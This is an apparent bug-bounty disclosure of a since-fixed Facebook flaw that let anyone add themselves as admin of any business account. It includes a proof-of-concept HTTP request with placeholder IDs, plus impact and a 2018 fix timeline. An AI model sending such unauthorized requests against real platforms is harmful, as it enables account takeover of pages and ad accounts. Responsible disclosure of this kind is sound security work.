Facebook Business Takeover

There is a call to import admins to a business account. The call at the time didn’t seem to have any permissions set to it. This meant it was possible to add oneself as an admin to any business.
Proof of Concept

HTTP POST
/business/aymc_assets/admins/import/
Host: facebook.com
business_id=TARGET_BUSINESS_ID
admin_id=MALICIOUS_USER_ID
session_id=SESSION_ID


This will add the user to the business as an administrator.
Impact
This could have let an attacker without an existing role, take over any business account and gain access to various business assets (Facebook pages, Ad accounts, applications, Instagram accounts) connected to the business.
Timeline

  • Oct 9, 2018 – Report Sent
  • Oct 9, 2018 – Further investigation by Facebook
  • Oct 10, 2018 – Endpoint removed
  • Oct 15, 2018 – Confirmation of audit by Facebook
  • Oct 15, 2018 – Fixed by Facebook
  • Oct 17, 2018 – $27,500 bounty awarded by Facebook